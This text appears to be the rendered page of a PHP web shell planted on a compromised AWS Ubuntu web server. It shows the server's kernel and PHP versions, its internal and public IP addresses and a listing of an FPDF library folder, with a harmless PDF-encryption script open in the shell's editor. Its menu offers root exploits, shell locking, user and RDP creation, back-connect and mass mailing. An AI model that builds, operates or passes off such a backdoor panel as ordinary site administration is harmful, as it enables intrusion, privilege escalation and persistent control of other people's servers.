Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.155.253
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ssc /
maya-pdf /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
fpdi
[ DIR ]
drwxr-xr-x
tutorial
[ DIR ]
drwxr-xr-x
FAQ.htm
13.95
KB
-rwxr-xr-x
TarkaPDFEncryption.php
437
B
-rwxr-xr-x
fpdf.css
1.29
KB
-rwxr-xr-x
fpdf.php
53.77
KB
-rwxr-xr-x
histo.htm
6.6
KB
-rwxr-xr-x
install.txt
983
B
-rwxr-xr-x
license.txt
326
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TarkaPDFEncryption.php
<?php function pdfEncrypt ($origFile, $password, $destFile) { require_once("fpdi/FPDI_Protection.php"); $pdf =& new FPDI_Protection(); $pdf->FPDF(); $pagecount = $pdf->setSourceFile($origFile); for ($loop = 1; $loop <= $pagecount; $loop++) { $tplidx = $pdf->importPage($loop); $pdf->addPage(); $pdf->useTemplate($tplidx); } $pdf->SetProtection(array(), $password); $pdf->Output($destFile,"D"); return $destFile; } ?>
Close